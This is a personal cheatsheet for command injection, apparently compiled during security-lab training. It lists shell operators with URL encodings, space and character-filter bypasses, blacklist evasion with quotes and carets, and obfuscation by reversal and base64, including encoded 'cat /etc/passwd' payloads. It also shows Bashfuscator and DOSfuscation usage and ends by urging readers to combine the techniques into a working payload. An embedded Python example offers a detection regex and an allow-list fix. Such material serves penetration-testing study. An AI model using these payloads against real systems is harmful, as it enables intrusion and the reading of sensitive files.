These cheatsheets serve as my personal quick reference. Therefore, they’re less organized than the box walkthroughs, but I’ve shared them in case others find them useful.
Command injection methods
Operator | Symbol | URL Encoded | Execution Behavior |
---|---|---|---|
Semicolon | ; | %3b | Both |
New Line | \n | %0a | Both |
Background | & | %26 | Both (second output generally shown first) |
Pipe | \| | %7c | Both (only second output is shown) |
AND | && | %26%26 | Both (only if first succeeds) |
OR | \|\| | %7c%7c | Second (only if first fails) |
Sub-Shell | `` | %60%60 | Both (Linux-only) |
Sub-Shell | $() | %24%28%29 | Both (Linux-only) |
Note: If sanitization happens only on the front end (recognizable when no network request appears in the browser's developer tools as the input is rejected), it can be bypassed by intercepting the request with Burp Suite and editing it there.
Bypassing space filters
Bypass Technique | Description | Example Usage |
---|---|---|
%09 (Tab) | Replaces the space with a tab character. Both Linux and Windows interpret tabs as valid argument separators. | 127.0.0.1%0a%09whoami |
${IFS} | Uses the Linux Internal Field Separator (defaults to space/tab). Expands into a space automatically. | 127.0.0.1%0a${IFS}whoami |
Brace Expansion | Leverages Bash brace expansion to insert a space between arguments without explicitly typing it. | 127.0.0.1%0a{ls,-la} |
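To show why the blacklist-style filters these two tables target are the wrong control, here is an added example (my own code, not from the cheatsheet or any referenced lab): a naive filter of the kind that is bypassed, a log-triage normalizer that decodes the parameter and flags the operators and space-bypass tokens from the tables above, and the allow-list fix for a ping form, which parses the value as an IP address and passes it to `ping` as a single argv element without a shell. Function and variable names are my own.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote

# Added example (not from the cheatsheet): the shell operators from the injection
# table and the space-bypass tokens from the table above, as regexes for log review.
OPERATORS = re.compile(r"(;|\n|&&|\|\||&|\||`|\$\()")
SPACE_BYPASS = re.compile(r"(\t|\$\{IFS\}|\{[^}]*,[^}]*\})")


def naive_filter(raw: str) -> bool:
    """Blacklist of the kind the cheatsheet defeats: applied to the raw parameter,
    so URL-encoded operators (%0a, %09) are never seen. True means 'allowed'."""
    return not any(c in raw for c in ";&| ")


def flag_request(raw: str) -> list[str]:
    """Decode the parameter as the web server would, then report which operators
    or space-bypass tokens it contains. Meant for triage of access logs."""
    decoded = unquote(raw)
    hits = OPERATORS.findall(decoded) + SPACE_BYPASS.findall(decoded)
    return sorted(set(hits))


def build_ping_argv(raw: str) -> list[str]:
    """Allow-list alternative to filtering: parse the value as an IP address and
    pass it to ping as one argv element, so no shell ever parses it. Anything
    that is not a bare IP (including every payload above) raises ValueError."""
    host = ipaddress.ip_address(unquote(raw).strip())
    return ["ping", "-c", "1", str(host)]


def safe_ping(raw: str) -> int:
    """Run ping without shell=True; operators in argv are just bytes to ping."""
    return subprocess.run(build_ping_argv(raw), capture_output=True).returncode


if __name__ == "__main__":
    # Constructed sample of the payloads from the two tables above.
    for sample in ("127.0.0.1", "127.0.0.1%0a%09whoami", "127.0.0.1%0a${IFS}whoami",
                   "127.0.0.1%0a{ls,-la}", "127.0.0.1%26%26whoami"):
        print(f"{sample!r:30} allowed_by_naive_filter={naive_filter(sample)!s:5} "
              f"flags={flag_request(sample)}")
```

Every encoded payload passes `naive_filter` untouched, while `build_ping_argv` rejects all of them and accepts only the bare address.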
Bypassing restricted characters
Bypass Technique | Linux | Windows |
---|---|---|
Environment Variables | Extract specific characters from environment variables: `${PATH:0:1}` → `/`, `${LS_COLORS:10:1}` → `;` | Use substring extraction in CMD or indexing in PowerShell: `%HOMEPATH:~6,-11%` → `\` (`6` is the offset, `-11` the length), `$env:HOMEPATH[0]` → `\` |
Character Shifting | Shift ASCII characters using `tr`. Example (get `\`): `echo $(tr '!-}' '"-~' <<< [)` (replace `[` with the character preceding the one you want) | PowerShell can shift characters by ASCII value, though the syntax is longer. Example: `[char](91+1)` produces `\` |
Exploring Variables | Use `printenv` to list environment variables and pick useful characters. | Use `Get-ChildItem Env:` in PowerShell to explore environment variables for usable characters, then index into one, e.g. `$env:PROGRAMFILES[10]` |
Bypassing blacklisted commands
Bypass Technique | Linux | Windows |
---|---|---|
Insert Quotes (works on both; the number of quotes must be even and the quote types must not be mixed) | Use single or double quotes between characters: `w'h'o'am'i`, `w"h"o"am"i` | Same trick works in CMD and PowerShell: `w'h'o'am'i`, `w"h"o"am"i` |
Ignored Characters (Linux only) | Insert Bash-tolerated characters inside commands: `who$@ami`, `w\ho\am\i` | – (not applicable) |
Caret Insertion (Windows only) | – (not applicable) | Insert `^` into commands in CMD: `who^ami` |
Advanced command obfuscation
Obfuscation Technique | Linux | Windows |
---|---|---|
Case Manipulation | Linux is case-sensitive, so the case must be normalized: `$(tr "[A-Z]" "[a-z]" <<< "WhOaMi")`, `$(a="WhOaMi"; printf %s "${a,,}")` | Windows is case-insensitive, so any variation works: `WhOaMi`, `WHOAMI` |
Reversed Commands | Reverse the string with `rev` and execute: `echo 'whoami' \| rev` → `imaohw`, then `$(rev <<< 'imaohw')` | Reverse the string with PowerShell array slicing: `"whoami"[-1..-20] -join ''` → `imaohw`, then `iex "$('imaohw'[-1..-20] -join '')"` |
Encoded Commands (Base64) | Encode the command and decode it at runtime: `echo -n 'cat /etc/passwd \| grep 33' \| base64`, then `bash <<< $(base64 -d <<< Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)` | Encode the command as UTF-16LE Base64: `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))`, then `iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"` |
Evasion tools
Tool | Platform | Description | Example Usage |
---|---|---|---|
Bashfuscator | Linux | Obfuscates Bash commands using multiple techniques. | `./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1`; execute the output with `bash -c 'eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'` |
DOSfuscation | Windows | Interactive tool to obfuscate CMD or PowerShell commands. | `Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt`, then `Invoke-DOSfuscation> encoding`; execute the output in CMD or PowerShell: `typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt` |
Combine these techniques as needed to build a working payload.